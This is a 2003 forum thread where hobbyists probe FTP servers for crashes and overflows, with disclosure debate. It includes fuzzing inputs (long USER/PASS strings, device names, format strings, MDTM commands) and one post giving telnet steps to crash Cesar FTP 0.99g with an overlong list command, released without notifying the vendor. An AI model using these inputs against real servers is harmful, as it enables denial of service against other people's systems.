First of all, sorry for my english. I'm trying to hack or crash a ftp server (Bullet ProofFTP server),no it's a real hack because it's in my own PC. I'm researching about find exploits.
I try to make a buffer overflow sending too much characters.Ex: USER AAAAAAAAAAAAAAAAAAA... PASS BBBBBBBBBBBBBBBBBBB... LS AAAAAAAAAAAAAAAAAAAAA...
Too I try with devices of windows (it's running in it),but always said directory forbidden: LS /AUX/AUX CD CON/CON CD CLOCK$ LS CONFIG$ the same with LPTn, COMn,PRN...
The last that I try was format string exploit %f%x%x (or something that like it). But I don't understand really this, anyone can explain me it??
Anyone know other methods to try?? I think that's it's more easy first crash the server, after try to hack.
Greetings, thank for all!
beardednose
Jul 16 2003, 12:36 PM
Leptom, welcome to the board. Your English is fine. No apologies necessary.
t0bban
Jul 18 2003, 10:57 AM
Leptom; I've got a few tricks up my sleeve to crach an ftp server, but I'm not sure it's so good to tell them just yet, I've notified the vendor and hopefully they'll reply to me that they're fixing it withing the next week, otherwise I'll make the bug public, which means that they (the vendor) needs to get started.. Post me a message in a week or so and I'll tell you all.
Now you're prolly thinking "What a fooker, aint sharing" but my goal isn't to be destructive, better yet to be constructive. Hope you understand my position on this board.
Leptom
Jul 21 2003, 07:51 AM
Thank you, I understand your position. Its the most correct (I think), If the vendor dont have the patch. I will be waiting news from you.
Thank again
t0bban
Jul 30 2003, 01:58 PM
Still no news from the Vendor... Might just release it then.. At work now, but perhaps when I get home.. But I rather not, because it can crash the specified FTP Server (Which is BulletProof FTP Server (G6)) in a matter of seconds. And that's not what I want, I want the problem fixed yaknow.
ComSec
Jul 30 2003, 03:24 PM
t0bban...have you reported it to bugtaq or cert yet ? if the vendor dont respond to repeated e-mails...then you have no option but to go public.... soon gets them moving...
Leptom
Jul 31 2003, 07:51 AM
I understand the problem, I only want to learn about find exploits... but others maybe want to crash true ftp server. You aren't hurry up for me'don't worry I can wait :-) thank
t0bban
Jul 31 2003, 08:13 AM
No reply this far. I haven't posted the issue on Bugtraq yet. I don't want to go public with this until there's a patch out, even if it means increased speed in developing a patch, because all our FTPservers is of that kind (Which is how we discovered the bug).
ComSec
Jul 31 2003, 10:40 AM
QUOTE (t0bban @ Jul 31 2003, 08:13 AM)
No reply this far. I haven't posted the issue on Bugtraq yet. I don't want to go public with this until there's a patch out, even if it means increased speed in developing a patch, because all our FTPservers is of that kind (Which is how we discovered the bug).
if you have identified and isolated the problem...then why not make a patch youself ?
t0bban
Jul 31 2003, 02:57 PM
Because I wouldn't know howto.. And it's nothing I've got time to spare doing either. I'm working 8 hrs a day, then I get home, change, get to the Golfcourse then I go home and sleep
GSecur
Jul 31 2003, 04:07 PM
All you have to do is send an e-mail with your findings to bugtraq@securityfocus.com
what
Aug 10 2003, 06:01 AM
well, I just wanted to report some of my own findings on the way that BPFTP processes it's commands. this is what i had when i sent them to the server.
mdtm sssssssssssss 550 'sssssssssssss' : no such file or directory.
--no effect on server--
mdtm !sssssssssss 550 '!sssssssssss' : no such file or directory.
--no effect on server--
mdtm ~ssssssssssssssssssssssss 550 '~ssssssssssssssssssssssss' : no such file or directory.
--we could now be looking at a buffer overflow exploit or just DoS--
again, these are just findings that i have found interesting. I am currently debating on whether or not I should reveal an exploit in Cesar FTP (DoS/Buffer Overflow) but i am willing to trade info with those that are interested. . . .
Most likely, I will post to bugtraq later, the vendor can look at the posts just like everyone else.
what
Aug 10 2003, 04:54 PM
it seems that you can make the CPU usage go to 100% by issueing these commands very quickly and repeatedly in a longer format.
t0bban
Aug 10 2003, 07:43 PM
A simple DoS attack found here perhaps? How do you send these commands to the FTP server, lets say if it's behind a firewall. Would it still be possible? What way do you send these commands normally?
what
Aug 11 2003, 02:50 PM
typically, ftp servers are not hidden behind a firewall, but there are many ways you can bypass them by using NMAP or Fpipe by Foundstone. This is really just a simple DoS attack, but should be stopped. I connect using telnet, and then issue the commands. If this was automated through a rather simple program, then CPU usage would not only go up to but exceed 100%. The commands i use are shown above, through telnet. Such as:
C:\> telnet 255.255.255.225 21
If you use FTP, then issuing the commands will make the client (local) ftp server crash. This is not useful to anyone.
I will work on a prog to demonstrate later.
t0bban
Aug 11 2003, 03:26 PM
Great.
fUSiON
Aug 14 2003, 01:43 PM
Mh hi all ,,
I tried this command over telnet on my FTP Server, it seem it doesnt work for G6FTPServ or not ?.. (000002) 14.08.2003 15:36:20 - (not logged in) (127.0.0.1) > MDTM ~ssssssssssssssssssssssss (000002) 14.08.2003 15:36:20 - (not logged in) (127.0.0.1) > 530 Please login with USER and PASS first. (000002) 14.08.2003 15:36:29 - (not logged in) (127.0.0.1) > MDTM ~ssssssssssssssssssssss/a/~ (000002) 14.08.2003 15:36:29 - (not logged in) (127.0.0.1) > 530 Please login with USER and PASS first. (000002) 14.08.2003 15:36:35 - (not logged in) (127.0.0.1) > MDTM ssssssssssssssssssssss/~ (000002) 14.08.2003 15:36:35 - (not logged in) (127.0.0.1) > 530 Please login with USER and PASS first.
thx
n1n1n1
Aug 14 2003, 04:30 PM
You should try to do what it wants you to do: 530 Please login with USER and PASS first
something else:
i dont't see any bug here. "~" is the server root (I think) and "mdtm" showes time+date this file/folder was created.
what
Aug 21 2003, 11:09 PM
i'm going to continue to play with bulletproof ftp, now it's just a matter of time. . . .
anyways, just because i feel bad, i will release my current exploit fot Cesar FTP v0.99g (latest version). The server is fairly popular, but it is free, so many people like it (cheap). anyways, here is what you need to d
1.Connect with telnet 2.Log in (anonymous access works fine) 3.Issue this command: list*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
the vendor has not been notified. this IS the LATEST version of thier software, and is exploitable on all previous versions.
POSTED 8/21/03, currently exploitable.
i would like to see that bpftp exploit you have, but we can wait. . . . . .
alexpower
Aug 31 2003, 09:33 AM
can someone help me too hack an ftp plz?
Leptom
Sep 2 2003, 08:07 AM
hi,
I come back from holydays. I was trying about: MDTM ~ssssssssssssssssssssssss But ftpd only get a limited amount of characters, if you put more of this amount it ignore it. Bye
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
,,
